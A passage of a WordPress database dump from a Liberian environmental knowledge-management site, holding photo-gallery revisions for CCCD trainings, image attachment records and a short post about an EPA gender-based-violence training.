role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->','Photo Gallery','','inherit','closed','closed','','3433-revision-v1','','','2021-01-26 15:20:21','2021-01-26 15:20:21','',3433,'https://ekmsliberia.info/3433-revision-v1/',0,'revision','',0),(3436,42,'2021-01-26 15:22:56','2021-01-26 15:22:56','<!-- wp:heading -->\n<h2>CCCD Training in Ganta, Nimba on January, 2019</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[\"3431\",\"3317\",\"3130\",\"3125\",\"3118\",\"3039\",\"2910\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3431\" data-id=\"3431\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/epa.png\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3317\" data-id=\"3317\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/nap.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3130\" data-id=\"3130\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/118265702_641907606451023_8403732740422242380_o-1024x613.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3125\" data-id=\"3125\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/117999801_638497756792008_4036954288064851198_o-1024x460.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3118\" data-id=\"3118\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/08/ekms-1024x618.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3039\" data-id=\"3039\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/03/EPA2.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-2910\" data-id=\"2910\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_training_photo.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Photo Gallery','','inherit','closed','closed','','3433-revision-v1','','','2021-01-26 15:22:56','2021-01-26 15:22:56','',3433,'https://ekmsliberia.info/3433-revision-v1/',0,'revision','',0),(3438,42,'2021-01-29 08:23:44','2021-01-29 08:23:44','<!-- wp:paragraph -->\n<p>The Gender Office at the EPA held a-day long training on Wednesday, 27 January for female staff as part of the celebration of the 16 days of activism against gender-based violence in Liberia. The celebration wasn’t possible last year due to the COVID-19 health protocols. Thanks to Mrs. Josephine F. Doles, Gender Coordinator for ably organizing and executing the event.</p>\n<!-- /wp:paragraph -->','The Gender Office at the EPA held a-day long training celebrating the 6 days of activism against gender-based violence in Liberia.','','publish','closed','closed','','the-gender-office-at-the-epa-held-a-day-long-training-celebrating-the-6-days-of-activism-against-gender-based-violence-in-liberia','','','2021-01-29 08:23:47','2021-01-29 08:23:47','',0,'https://ekmsliberia.info/?p=3438',183,'post','',0),(3439,42,'2021-01-29 08:23:00','2021-01-29 08:23:00','','','','inherit','open','closed','','gender-2','','','2021-01-29 08:23:08','2021-01-29 08:23:08','',3438,'https://ekmsliberia.info/wp-content/uploads/2021/01/gender.png',0,'attachment','image/png',0),(3440,42,'2021-01-29 08:23:44','2021-01-29 08:23:44','<!-- wp:paragraph -->\n<p>The Gender Office at the EPA held a-day long training on Wednesday, 27 January for female staff as part of the celebration of the 16 days of activism against gender-based violence in Liberia. The celebration wasn’t possible last year due to the COVID-19 health protocols. Thanks to Mrs. Josephine F. Doles, Gender Coordinator for ably organizing and executing the event.</p>\n<!-- /wp:paragraph -->','The Gender Office at the EPA held a-day long training celebrating the 6 days of activism against gender-based violence in Liberia.','','inherit','closed','closed','','3438-revision-v1','','','2021-01-29 08:23:44','2021-01-29 08:23:44','',3438,'https://ekmsliberia.info/3438-revision-v1/',0,'revision','',0),(3441,42,'2021-01-29 14:49:37','2021-01-29 14:49:37','','118007112_312462773531184_4445376849983355021_n','','inherit','open','closed','','118007112_312462773531184_4445376849983355021_n','','','2021-01-29 14:49:37','2021-01-29 14:49:37','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118007112_312462773531184_4445376849983355021_n.jpg',0,'attachment','image/jpeg',0),(3442,42,'2021-01-29 14:49:41','2021-01-29 14:49:41','','118024845_312462840197844_9178285810187896342_o','','inherit','open','closed','','118024845_312462840197844_9178285810187896342_o','','','2021-01-29 14:49:41','2021-01-29 14:49:41','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118024845_312462840197844_9178285810187896342_o.jpg',0,'attachment','image/jpeg',0),(3443,42,'2021-01-29 14:49:45','2021-01-29 14:49:45','','118031965_312462886864506_7678681092268067942_o','','inherit','open','closed','','118031965_312462886864506_7678681092268067942_o','','','2021-01-29 14:49:45','2021-01-29 14:49:45','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118031965_312462886864506_7678681092268067942_o.jpg',0,'attachment','image/jpeg',0),(3444,42,'2021-01-29 14:49:48','2021-01-29 14:49:48','','118036655_312463550197773_1815018273815766510_o','','inherit','open','closed','','118036655_312463550197773_1815018273815766510_o','','','2021-01-29 14:49:48','2021-01-29 14:49:48','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118036655_312463550197773_1815018273815766510_o.jpg',0,'attachment','image/jpeg',0),(3445,42,'2021-01-29 14:49:51','2021-01-29 14:49:51','','118037600_312462953531166_7196909441334733590_o','','inherit','open','closed','','118037600_312462953531166_7196909441334733590_o','','','2021-01-29 14:49:51','2021-01-29 14:49:51','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118037600_312462953531166_7196909441334733590_o.jpg',0,'attachment','image/jpeg',0),(3446,42,'2021-01-29 14:49:53','2021-01-29 14:49:53','','118059299_312462780197850_2229825346739181096_n','','inherit','open','closed','','118059299_312462780197850_2229825346739181096_n','','','2021-01-29 14:49:53','2021-01-29 14:49:53','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118059299_312462780197850_2229825346739181096_n.jpg',0,'attachment','image/jpeg',0),(3447,42,'2021-01-29 14:49:55','2021-01-29 14:49:55','','118074086_312462850197843_2652956027928466277_o','','inherit','open','closed','','118074086_312462850197843_2652956027928466277_o','','','2021-01-29 14:49:55','2021-01-29 14:49:55','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118074086_312462850197843_2652956027928466277_o.jpg',0,'attachment','image/jpeg',0),(3448,42,'2021-01-29 14:51:05','2021-01-29 14:51:05','<!-- wp:heading -->\n<h2>CCCD Inspectors Training in Bong County in August 17-18, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[\"3441\",\"3442\",\"3443\",\"3444\",\"3445\",\"3446\",\"3447\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3441\" data-id=\"3441\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118007112_312462773531184_4445376849983355021_n.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3442\" data-id=\"3442\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118024845_312462840197844_9178285810187896342_o-1024x612.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3443\" data-id=\"3443\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118031965_312462886864506_7678681092268067942_o-1024x618.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3444\" data-id=\"3444\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118036655_312463550197773_1815018273815766510_o-1024x597.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3445\" data-id=\"3445\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118037600_312462953531166_7196909441334733590_o-1024x862.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3446\" data-id=\"3446\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118059299_312462780197850_2229825346739181096_n.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3447\" data-id=\"3447\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118074086_312462850197843_2652956027928466277_o-1024x870.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:heading -->\n<h2></h2>\n<!-- /wp:heading -->\n\n<!-- wp:gallery -->\n<figure class=\"wp-block-gallery columns-0 is-cropped\"><ul class=\"blocks-gallery-grid\"></ul></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery -->\n<figure class=\"wp-block-gallery columns-0 is-cropped\"><ul class=\"blocks-gallery-grid\"></ul></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:gallery -->\n<figure class=\"wp-block-gallery columns-0 is-cropped\"><ul class=\"blocks-gallery-grid\"></ul></figure>\n<!-- /wp:gallery -->','Photo Gallery','','inherit','closed','closed','','3433-revision-v1','','','2021-01-29 14:51:05','2021-01-29 14:51:05','',3433,'https://ekmsliberia.info/3433-revision-v1/',0,'revision','',0),(3449,42,'2021-01-29 14:54:24','2021-01-29 14:54:24','','118010821_312467090197419_4273034739788428671_o','','inherit','open','closed','','118010821_312467090197419_4273034739788428671_o','','','2021-01-29 14:54:24','2021-01-29 14:54:24','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118010821_312467090197419_4273034739788428671_o.jpg',0,'attachment','image/jpeg',0),(3450,42,'2021-01-29 14:54:29','2021-01-29 14:54:29','','118036651_312467243530737_3520735325747764254_o','','inherit','open','closed','','118036651_312467243530737_3520735325747764254_o','','','2021-01-29 14:54:29','2021-01-29 14:54:29','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118036651_312467243530737_3520735325747764254_o.jpg',0,'attachment','image/jpeg',0),(3451,42,'2021-01-29 14:54:32','2021-01-29 14:54:32','','118049912_312467376864057_6476498378591711743_o','','inherit','open','closed','','118049912_312467376864057_6476498378591711743_o','','','2021-01-29 14:54:32','2021-01-29 14:54:32','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118049912_312467376864057_6476498378591711743_o.jpg',0,'attachment','image/jpeg',0),(3452,42,'2021-01-29 14:54:35','2021-01-29 14:54:35','','118072658_312467170197411_1424422127742042449_o','','inherit','open','closed','','118072658_312467170197411_1424422127742042449_o','','','2021-01-29 14:54:35','2021-01-29 14:54:35','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118072658_312467170197411_1424422127742042449_o.jpg',0,'attachment','image/jpeg',0),(3453,42,'2021-01-29 14:54:38','2021-01-29 14:54:38','','118081105_312467290197399_4620837734752160912_o','','inherit','open','closed','','118081105_312467290197399_4620837734752160912_o','','','2021-01-29 14:54:38','2021-01-29 14:54:38','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118081105_312467290197399_4620837734752160912_o.jpg',0,'attachment','image/jpeg',0),(3454,42,'2021-01-29 14:54:41','2021-01-29 14:54:41','','118114178_312467406864054_3195001015165433334_o','','inherit','open','closed','','118114178_312467406864054_3195001015165433334_o','','','2021-01-29 14:54:41','2021-01-29 14:54:41','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118114178_312467406864054_3195001015165433334_o.jpg',0,'attachment','image/jpeg',0),(3455,42,'2021-01-29 14:54:44','2021-01-29 14:54:44','','118129138_312467320197396_6367962160678170690_o','','inherit','open','closed','','118129138_312467320197396_6367962160678170690_o','','','2021-01-29 14:54:44','2021-01-29 14:54:44','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118129138_312467320197396_6367962160678170690_o.jpg',0,'attachment','image/jpeg',0),(3456,42,'2021-01-29 14:54:47','2021-01-29 14:54:47','','118139665_312467110197417_509357946596157302_o','','inherit','open','closed','','118139665_312467110197417_509357946596157302_o','','','2021-01-29 14:54:47','2021-01-29 14:54:47','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118139665_312467110197417_509357946596157302_o.jpg',0,'attachment','image/jpeg',0),(3457,42,'2021-01-29 14:54:50','2021-01-29 14:54:50','','118247279_312467190197409_8948607088124320484_o','','inherit','open','closed','','118247279_312467190197409_8948607088124320484_o','','','2021-01-29 14:54:50','2021-01-29 14:54:50','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118247279_312467190197409_8948607088124320484_o.jpg',0,'attachment','image/jpeg',0),(3458,42,'2021-01-29 14:54:53','2021-01-29 14:54:53','','118257021_312467133530748_3109687021037286243_o','','inherit','open','closed','','118257021_312467133530748_3109687021037286243_o','','','2021-01-29 14:54:53','2021-01-29 14:54:53','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118257021_312467133530748_3109687021037286243_o.jpg',0,'attachment','image/jpeg',0),(3459,42,'2021-01-29 14:54:56','2021-01-29 14:54:56','','118319340_312467346864060_1861816488750532017_o','','inherit','open','closed','','118319340_312467346864060_1861816488750532017_o','','','2021-01-29 14:54:56','2021-01-29 14:54:56','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118319340_312467346864060_1861816488750532017_o.jpg',0,'attachment','image/jpeg',0),(3460,42,'2021-01-29 14:56:46','2021-01-29 14:56:46','','118286420_315769223200539_7870423496580352605_o','','inherit','open','closed','','118286420_315769223200539_7870423496580352605_o','','','2021-01-29 14:56:46','2021-01-29 14:56:46','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118286420_315769223200539_7870423496580352605_o.jpg',0,'attachment','image/jpeg',0),(3461,42,'2021-01-29 14:56:49','2021-01-29 14:56:49','','118302200_315769263200535_3757459247192883262_o','','inherit','open','closed','','118302200_315769263200535_3757459247192883262_o','','','2021-01-29 14:56:49','2021-01-29 14:56:49','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118302200_315769263200535_3757459247192883262_o.jpg',0,'attachment','image/jpeg',0),(3462,42,'2021-01-29 14:56:54','2021-01-29 14:56:54','','118306768_315769376533857_4579108221415119983_o','','inherit','open','closed','','118306768_315769376533857_4579108221415119983_o','','','2021-01-29 14:56:54','2021-01-29 14:56:54','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118306768_315769376533857_4579108221415119983_o.jpg',0,'attachment','image/jpeg',0),(3463,42,'2021-01-29 14:57:00','2021-01-29 14:57:00','','118339529_315768879867240_8957022521755584142_o','','inherit','open','closed','','118339529_315768879867240_8957022521755584142_o','','','2021-01-29 14:57:00','2021-01-29 14:57:00','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118339529_315768879867240_8957022521755584142_o.jpg',0,'attachment','image/jpeg',0),(3464,42,'2021-01-29 14:57:08','2021-01-29 14:57:08','','118374891_315769406533854_4610821984961538987_o','','inherit','open','closed','','118374891_315769406533854_4610821984961538987_o','','','2021-01-29 14:57:08','2021-01-29 14:57:08','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118374891_315769406533854_4610821984961538987_o.jpg',0,'attachment','image/jpeg',0),(3465,42,'2021-01-29 14:57:12','2021-01-29 14:57:12','','118516642_318832852894176_1811083475951686199_o','','inherit','open','closed','','118516642_318832852894176_1811083475951686199_o','','','2021-01-29 14:57:12','2021-01-29 14:57:12','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118516642_318832852894176_1811083475951686199_o.jpg',0,'attachment','image/jpeg',0),(3466,42,'2021-01-29 14:57:15','2021-01-29 14:57:15','','118517244_318828242894637_3179541288288323454_o','','inherit','open','closed','','118517244_318828242894637_3179541288288323454_o','','','2021-01-29 14:57:15','2021-01-29 14:57:15','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118517244_318828242894637_3179541288288323454_o.jpg',0,'attachment','image/jpeg',0),(3467,42,'2021-01-29 14:57:19','2021-01-29 14:57:19','','118521094_318828412894620_1359866884748954037_o','','inherit','open','closed','','118521094_318828412894620_1359866884748954037_o','','','2021-01-29 14:57:19','2021-01-29 14:57:19','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118521094_318828412894620_1359866884748954037_o.jpg',0,'attachment','image/jpeg',0),(3468,42,'2021-01-29 14:57:22','2021-01-29 14:57:22','','118531582_318831672894294_733920385961592984_o','','inherit','open','closed','','118531582_318831672894294_733920385961592984_o','','','2021-01-29 14:57:22','2021-01-29 14:57:22','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118531582_318831672894294_733920385961592984_o.jpg',0,'attachment','image/jpeg',0),(3469,42,'2021-01-29 14:57:26','2021-01-29 14:57:26','','118532262_318828476227947_6854980371134826307_o','','inherit','open','closed','','118532262_318828476227947_6854980371134826307_o','','','2021-01-29 14:57:26','2021-01-29 14:57:26','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118532262_318828476227947_6854980371134826307_o.jpg',0,'attachment','image/jpeg',0),(3470,42,'2021-01-29 14:57:29','2021-01-29 14:57:29','','118534938_318828726227922_3755715513135385658_o','','inherit','open','closed','','118534938_318828726227922_3755715513135385658_o','','','2021-01-29 14:57:29','2021-01-29 14:57:29','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118534938_318828726227922_3755715513135385658_o.jpg',0,'attachment','image/jpeg',0),(3471,42,'2021-01-29 14:57:33','2021-01-29 14:57:33','','118536633_318828566227938_5387686246171594942_o','','inherit','open','closed','','118536633_318828566227938_5387686246171594942_o','','','2021-01-29 14:57:33','2021-01-29 14:57:33','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118536633_318828566227938_5387686246171594942_o.jpg',0,'attachment','image/jpeg',0),(3472,42,'2021-01-29 14:57:37','2021-01-29 14:57:37','','118538060_318831209561007_4651513210745790421_o','','inherit','open','closed','','118538060_318831209561007_4651513210745790421_o','','','2021-01-29 14:57:37','2021-01-29 14:57:37','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118538060_318831209561007_4651513210745790421_o.jpg',0,'attachment','image/jpeg',0),(3473,42,'2021-01-29 14:57:41','2021-01-29 14:57:41','','118580522_318831586227636_510067784901104873_o','','inherit','open','closed','','118580522_318831586227636_510067784901104873_o','','','2021-01-29 14:57:41','2021-01-29 14:57:41','',3433,'https://ekmsliberia.info/wp-content/uploads/2021/01/118580522_318831586227636_510067784901104873_o.jpg',0,'attachment','image/jpeg',0),(3474,42,'2021-01-29 14:58:12','2021-01-29 14:58:12','<!-- wp:heading -->\n<h2>CCCD Inspectors Training in Bong County in August 17-18, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[\"3441\",\"3442\",\"3443\",\"3444\",\"3445\",\"3446\",\"3447\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3441\" data-id=\"3441\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118007112_312462773531184_4445376849983355021_n.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3442\" data-id=\"3442\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118024845_312462840197844_9178285810187896342_o-1024x612.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3443\" data-id=\"3443\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118031965_312462886864506_7678681092268067942_o-1024x618.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3444\" data-id=\"3444\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118036655_312463550197773_1815018273815766510_o-1024x597.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3445\" data-id=\"3445\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118037600_312462953531166_7196909441334733590_o-1024x862.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3446\" data-id=\"3446\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118059299_312462780197850_2229825346739181096_n.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3447\" data-id=\"3447\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118074086_312462850197843_2652956027928466277_o-1024x870.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:heading -->\n<h2>CCCD Media Training in Nimba August 20-22, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[3449,3450,3451,3452,3453,3454,3455,3456,3457,3458,3459],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3449\" data-id=\"3449\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118010821_312467090197419_4273034739788428671_o-1024x855.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3450\" data-id=\"3450\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118036651_312467243530737_3520735325747764254_o-1024x703.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3451\" data-id=\"3451\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118049912_312467376864057_6476498378591711743_o-1024x966.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3452\" data-id=\"3452\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118072658_312467170197411_1424422127742042449_o-1024x460.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3453\" data-id=\"3453\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118081105_312467290197399_4620837734752160912_o-1024x884.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3454\" data-id=\"3454\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118114178_312467406864054_3195001015165433334_o-1024x645.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3455\" data-id=\"3455\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118129138_312467320197396_6367962160678170690_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3456\" data-id=\"3456\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118139665_312467110197417_509357946596157302_o-1024x941.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3457\" data-id=\"3457\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118247279_312467190197409_8948607088124320484_o-1024x912.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3458\" data-id=\"3458\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118257021_312467133530748_3109687021037286243_o-1015x1024.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3459\" data-id=\"3459\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118319340_312467346864060_1861816488750532017_o-1024x926.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:heading -->\n<h2>CCCD EKMS Learning-By-Doing Training in Buchanan, August 26-28, 2020</h2>\n<!-- /wp:heading -->\n\n<!-- wp:jetpack/slideshow {\"ids\":[\"3463\",\"3464\",\"3460\",\"3461\",\"3462\",\"3465\",\"3466\",\"3467\",\"3468\",\"3469\",\"3470\",\"3471\",\"3472\",\"3473\"],\"sizeSlug\":\"full\"} -->\n<div class=\"wp-block-jetpack-slideshow aligncenter\" data-effect=\"slide\"><div class=\"wp-block-jetpack-slideshow_container swiper-container\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3463\" data-id=\"3463\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118339529_315768879867240_8957022521755584142_o-1024x616.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3464\" data-id=\"3464\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118374891_315769406533854_4610821984961538987_o-1024x613.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3460\" data-id=\"3460\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118286420_315769223200539_7870423496580352605_o-1024x537.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3461\" data-id=\"3461\" 